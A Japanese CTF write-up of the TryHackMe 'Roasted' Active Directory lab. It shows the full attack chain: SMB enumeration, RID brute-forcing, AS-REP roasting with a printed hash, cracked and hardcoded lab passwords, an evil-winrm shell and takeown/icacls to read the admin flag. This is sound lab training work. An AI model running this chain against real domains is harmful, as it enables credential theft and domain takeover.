問題
Write up
偵察
ポートスキャン
bash
┌─[takuramy@parrot]─[~/Desktop/THM/Roasted]
└──╼ $nmap -A 10.145.158.101 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 16:15 JST
Nmap scan report for 10.145.158.101
Host is up (0.24s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-14 07:15:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-04-14T07:15:54
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.61 seconds
SMBが怪しい気がする。
SMB
SMB共有一覧を匿名で取得してみる
bash
$smbclient -L //10.145.158.101 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.145.158.101 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
いくつか共有フォルダは見つかったが、匿名で入れたのは以下の2つ
$smbclient //10.145.158.101/vulnNet-Business-Anonymous -N
smb: \> ls
. D 0 Sat Mar 13 11:46:40 2021
.. D 0 Sat Mar 13 11:46:40 2021
Business-Manager.txt A 758 Fri Mar 12 10:24:34 2021
Business-Sections.txt A 654 Fri Mar 12 10:24:34 2021
Business-Tracking.txt A 471 Fri Mar 12 10:24:34 2021
8771839 blocks of size 4096. 4517773 blocks available
$smbclient //10.145.158.101/vulnNet-Enterprise-Anonymous -N
smb: \> ls
. D 0 Sat Mar 13 11:46:40 2021
.. D 0 Sat Mar 13 11:46:40 2021
Enterprise-Operations.txt A 467 Fri Mar 12 10:24:34 2021
Enterprise-Safety.txt A 503 Fri Mar 12 10:24:34 2021
Enterprise-Sync.txt A 496 Fri Mar 12 10:24:34 2021
8771839 blocks of size 4096. 4517729 blocks available
それぞれのフォルダから以下のような情報を取得
【vulnNet-Business-Anonymous】
- ビジネスマネージャー : Alexa Whitehat
- ビジネスマネージャーへの連絡先:1337 0000 7331
- ビジネス関連以外の提案担当 : Jack Goldenhand
【vulnNet-Enterprise-Anonymous】
- セキュリティマネージャー : Tony Skid
- 128ビットSSL暗号化を使用し、毎日バックアップを作成
- インフラ担当 : Johnny Leet
- 同期マネージャーへの連絡先:7331 0000 1337
netexec
netexec(旧crackmapexec)を使用して、smb経由でRIDを総当たりしてユーザ・グループを列挙する
RIDとは?
SIDの一部
WindowsのユーザのSIDは以下の形になっている
S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX-500
SIDの最後の数字の500 ← これがRID(Relative ID)
※500はAdministrator
bash
$netexec smb 10.145.158.101 -u guest -p '' --rid-brute
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 [+] vulnnet-rst.local\guest:
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 500: VULNNET-RST\Administrator (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 501: VULNNET-RST\Guest (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 502: VULNNET-RST\krbtgt (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 513: VULNNET-RST\Domain Users (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 514: VULNNET-RST\Domain Guests (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 515: VULNNET-RST\Domain Computers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 516: VULNNET-RST\Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 517: VULNNET-RST\Cert Publishers (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 518: VULNNET-RST\Schema Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 525: VULNNET-RST\Protected Users (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 526: VULNNET-RST\Key Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1109: VULNNET-RST\t-skid (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1110: VULNNET-RST\j-goldenhand (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1111: VULNNET-RST\j-leet (SidTypeUser)
コマンド結果から以下のユーザの存在を確認したのでユーザ名のリストを作成しておく
users.txt
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
administrator
guest
認証情報がほしい
impacket-GetNPUsersを使用して事前認証なしユーザのハッシュ取得
bash
$impacket-GetNPUsers vulnnet-rst.local/ -no-pass -usersfile users.txt -dc-ip 10.145.158.101
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:9d46582ea68caf591c39a5e4cbc2df77$1105a839ebff0fadfeb8d21fc32f91c8c6fecab76ee2b20b0315c4ba60954aa258f1309b9f4156421d6c0eee54a76a84845b7e3b964d256a352a910f390c170417d2ae43ac272180784e4d2bcb0fe3af3ab9871cc3d2a511416e5fdad4618171b2382be2ba259312ceee0836cd71e1d237b22cdfcc096dc904a7cdc9840f71c248b2d2b5138e6bbd77879f5a11f89c85fd7d1bf7936e2ae1575e12419ed1495c5dc1e3c6010f5fdec2a48b2867a1ae47031ec129cd3ffbc2a7c0e4c44f4fab22cfb891641097ce5a6bc32a63470a2ebb4c5f91d81229e5092b3517e65b97854e01955a18e42f3f575f72e606bfa4525ccf09c7b96381
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
ユーザt-skidのハッシュを獲得したので、hashcatに渡して解析する
bash
$hashcat t-skid-hash.txt /usr/share/wordlists/rockyou.txt
コマンド結果から以下のクレデンシャルを取得
ユーザ:t-skid
パスワード:tj072889*
侵入したい
SMB
認証情報を取得したので再度、SMBで見てみる
bash
$smbclient //10.144.166.196/SYSVOL -U t-skid%tj072889*
$smbclient //10.144.166.196/NETLOGON -U t-skid%tj072889*
匿名ログオン時と違うところは以下
- NETLOGON
- SYSVOL
以上の2つの共有フォルダにアクセス可能となった。
【NETLOGON】
ResetPassword.vbsを発見し、中身にクレデンシャルが直書きされていた
ResetPassword.vbs
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
【SYSVOL】
ここにもResetPassword.vbsを発見した。
NETLOGONにあったものと同じだった
evil-winrm
シェルを取りたいのでevil-winrmを試してみる
【t-skid】
このユーザはログイン不可
bash
$evil-winrm -i 10.145.158.101 -u t-skid -p 'tj072889*'
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
【a-whitehat】
bash
$evil-winrm -i 10.145.158.101 -u a-whitehat -p bNdKVkjv3RR9ht
*Evil-WinRM* PS C:\Users\a-whitehat\Documents>
侵入完了
user.txt
問題文でDesktop配下にあることが分かるので探してみたが空っぽ
PS
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> ls
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop>
C:\Users配下を見てみると、ほかのユーザを確認したので見てみると発見した
PS
*Evil-WinRM* PS C:\Users> type enterprise-core-vn\Desktop\user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}
権限等調査
whoami /groupsコマンドを打つと、美味しい権限がいくつか転がっている
PS
*Evil-WinRM* PS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Domain Admins Group S-1-5-21-1589833671-435344116-4136949213-512 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Denied RODC Password Replication Group Alias S-1-5-21-1589833671-435344116-4136949213-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
| 項目 | 状態 |
|---|---|
| ローカル権限 | 管理者 |
| ドメイン権限 | Domain Admins |
| セッション | High Integrity |
獲得したユーザはDomain Adminsグループに所属しており、ローカル管理者権限と併せてドメイン全体の制御権限を持つ状態である
system.txt
権限が揃っているのでsystem.txtを読みに行ってみる
問題文からも分かるようにAdministratorのDesktopにsystem.txtを発見したがACL(アクセス制御)がまだ効いてるのか読めない。
PS
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
Access to the path 'C:\Users\Administrator\Desktop\system.txt' is denied.
At line:1 char:1
+ type system.txt
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Admini...ktop\system.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
しかし最高権限があるので書き換えていく
- 所有者変更
PS
*Evil-WinRM* PS C:\Users\Administrator\Desktop> takeown /f system.txt
SUCCESS: The file (or folder): "C:\Users\Administrator\Desktop\system.txt" now owned by user "VULNNET-RST\a-whitehat".
- 権限付与
PS
*Evil-WinRM* PS C:\Users\Administrator\Desktop> icacls system.txt /grant Everyone:F
processed file: system.txt
Successfully processed 1 files; Failed processing 0 files
- 読む
PS
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}
最後に
windowsのハッキングはまだまだなれないですね。。。。
権限周りや、認証周りなど、、、勉強していかないと、、、、。